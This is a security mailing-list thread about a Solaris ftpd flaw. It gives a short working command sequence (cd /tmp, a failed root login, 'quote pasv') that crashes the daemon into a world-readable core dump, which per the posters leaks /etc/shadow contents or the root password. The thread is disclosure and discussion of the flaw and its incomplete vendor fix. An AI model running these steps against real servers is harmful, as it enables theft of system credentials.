Re: ftpd bug? Was: bin/1805: Bug in ftpd

[poland () cam2 gsfc nasa gov (James Poland 6-5251)]

Martin's method works for Solaris 2.5.1 as well. 'strings' on the core file
reveals the complete contents of /etc/shadow. This is not good. To reiterate,
if someone else is running an ftp session on host_a, start your own ftp
session with host_a. Then issue the commands
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv

Examine the resulting core file with the strings command.

This method does not work with Solaris 2.4.

> James Poland 6-5251 wrote:
> > On Solaris 2.5.1, the core file contains only the user's password in
> > cleartext. How hard is it to crash someone else's ftp session?
>
> Killing from the command line doesn't seem to work, but:
>
> SunOS 5.5:
>
> logon via ftp with your regular user/password,
> ftp> cd /tmp
> ftp> user root wrongpasswd
> ftp> quote pasv
>
> voila, root password in world readable core dump under /tmp
>
> -Martin
>
> PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
>     so the seem to have used the proposed fix
>
>          Checking for "pw != NULL"
>
>     So this proposal was simple and obvious   ... and incomplete. :)